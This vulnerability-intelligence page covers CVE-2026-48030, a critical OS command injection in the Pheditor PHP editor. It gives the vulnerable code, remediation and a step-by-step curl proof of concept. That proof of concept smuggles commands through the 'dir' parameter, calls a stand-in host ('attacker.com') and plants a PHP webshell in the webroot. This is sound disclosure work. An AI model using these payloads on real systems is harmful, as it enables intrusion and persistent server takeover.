What is the CVSS score of CVE-2026-48030?

CVE-2026-48030 has a CVSS 3.1 base score of 9.9 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H.

Which versions of Pheditor are affected by CVE-2026-48030?

Pheditor versions 2.0.1-2.0.3 contain a critical vulnerability (CVSS 9.9) allowing any authenticated user to execute arbitrary system commands with web server privileges, enabling full application…. A patch is available.

How to fix or mitigate CVE-2026-48030?

Within 24 hours: Identify and inventory all Pheditor instances running versions 2.0.1-2.0.3; restrict terminal permission access to essential personnel only. Within 7 days: Apply vendor-released patch to all affected Pheditor installations and verify successful deployment. Within 30 days: Review terminal permission assignments, audit access logs for unauthorized command execution activity, and assess potential impact from the exploitation window.

Pheditor CVE-2026-48030

CRITICAL

OS Command Injection (CWE-78)

2026-06-09 https://github.com/pheditor/pheditor

GHSA-jvc5-6g7q-c843

PHP RCE CSRF Command Injection

9.9

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Source Code Evidence Fetched

Jun 09, 2026 - 22:20 vuln.today

Analysis Generated

Jun 09, 2026 - 22:20 vuln.today

CVE Published

Jun 09, 2026 - 22:00 nvd

CRITICAL 9.9

DescriptionNVD

Summary

An OS Command Injection vulnerability in the terminal action handler allows any authenticated user to execute arbitrary OS commands by injecting shell metacharacters into the 'dir' POST parameter, completely bypassing the TERMINAL_COMMANDS whitelist and achieving full Remote Code Execution with web server privileges.

Details

The terminal handler in pheditor.php accepts two POST parameters: command and dir. Shell metacharacters are validated on $command only - $dir is passed to shell_exec() without any sanitization.

Vulnerable code (pheditor.php, line 554-586):

php

$command = $_POST['command'];  // ✓ metacharacters checked
$dir     = $_POST['dir'];      // ✗ NOT checked - vulnerable

if (strpos($command, '&')  !== false ||
    strpos($command, ';')  !== false ||
    strpos($command, '||') !== false) {
    die(...); // only guards $command, not $dir
}

$output = shell_exec(
    (empty($dir) ? null : 'cd ' . $dir . ' && ')
    . $command . ' && echo \ ; pwd'  // ← $dir injected here
);

An attacker sends dir=/tmp; curl attacker.com # - the semicolon in $dir is never checked, so the injected command executes freely.

Fix: replace $dir with escapeshellarg($dir) on line 586.

PoC

Requirements: valid credentials, terminal permission enabled (default)

Step 1 - Authenticate:

bash

curl -c cookies.txt -X POST http://TARGET/pheditor.php \
  -d "pheditor_password=admin" -L > /dev/null

Step 2 - Get CSRF token:

bash

TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
  grep -o 'token = "[a-f0-9]*"' | \
  grep -o '"[a-f0-9]*"' | tr -d '"')

Step 3 - Confirm curl is blocked via command field:

bash

curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "command=curl https://ifconfig.me" \
  --data-urlencode "dir=/tmp"


→ {"error":true,"message":"Command not allowed"}

Step 4 - Bypass whitelist via dir injection:

bash

TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
  grep -o 'token = "[a-f0-9]*"' | \
  grep -o '"[a-f0-9]*"' | tr -d '"')

curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "command=ls" \
  --data-urlencode "dir=/tmp; curl -s https://ifconfig.me #"


→ {"error":false,"message":"OK","dir":"<PUBLIC_IP>"}

Step 5 - Full RCE via webshell:

bash

curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "command=ls" \
  --data-urlencode "dir=/var/www/html; echo '<?php system($_GET["c"]);?>' > /var/www/html/shell.php #"

curl "http://TARGET/shell.php?c=id"


→ uid=33(www-data) gid=33(www-data) groups=33(www-data)

Impact

OS Command Injection (CWE-78). Any authenticated pheditor user with terminal permission enabled (default configuration) is able to:

Execute arbitrary OS commands as the web server user
Bypass the TERMINAL_COMMANDS whitelist entirely
Deploy persistent PHP webshells to the webroot
Read, write, or delete any file accessible to the web server
Potentially compromise other applications on the same server

Articles & Coverage 1

News Critical RCE in Pheditor 2.0.1-2.0.3 (PHP) - CVE-2026-48030 Jun 09, 2026

AnalysisAI

Authenticated remote code execution in Pheditor 2.0.1-2.0.3 lets any logged-in user with the default terminal permission bypass the TERMINAL_COMMANDS whitelist by injecting shell metacharacters into the unsanitized 'dir' POST parameter of pheditor.php, achieving full command execution as the web server user. Publicly available exploit code exists in the GitHub Security Advisory PoC, and the upstream commit confirms the root cause is missing escapeshellarg() on $dir before concatenation into shell_exec().

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon

Reach exposed pheditor.php

Delivery

Authenticate with valid credentials

Exploit

Fetch CSRF token from page

Install

POST action=terminal with shell metacharacters in dir

shell_exec() runs injected command as www-data

Execute

Drop PHP webshell in webroot

Impact

Persistent RCE and lateral movement

Recon

Reach exposed pheditor.php

Delivery

Authenticate with valid credentials

Exploit

Fetch CSRF token from page

Install

POST action=terminal with shell metacharacters in dir

shell_exec() runs injected command as www-data

Execute

Drop PHP webshell in webroot

Impact

Persistent RCE and lateral movement

Vulnerability AssessmentAI

Exploitation	Exploitation requires a valid Pheditor user session (CVSS PR:L) and that user must have the terminal permission enabled, which is the default configuration per the advisory, plus the pheditor.php endpoint must be network-reachable to the attacker. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	The CVSS 9.9 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) accurately reflects a network-reachable, low-complexity bug requiring only low privileges, with scope change because the resulting OS-level execution breaks out of the PHP application boundary. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker who has obtained or guessed Pheditor admin credentials (or compromised a low-privileged user with the default terminal permission) authenticates, grabs the CSRF token from the main page, and POSTs to pheditor.php with action=terminal, a benign command=ls, and a malicious dir value such as '/var/www/html; echo "<?php system($_GET[c]); ?>" > shell.php #'. The injected payload drops a PHP webshell into the webroot, after which the attacker has persistent unauthenticated RCE as www-data; the full chain is demonstrated step-by-step in the vendor's GHSA PoC.
Remediation	Upgrade Pheditor to the vendor-released patch version 2.0.4 as tracked in GHSA-jvc5-6g7q-c843; the one-line fix replaces $dir with escapeshellarg($dir) on the shell_exec() call in pheditor.php (commit 62b43df7cb8956a9b0deb9bec278ca8676c890c5). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify and inventory all Pheditor instances running versions 2.0.1-2.0.3; restrict terminal permission access to essential personnel only. …

Threat intelligence, references, and detailed analysis are available after sign-in.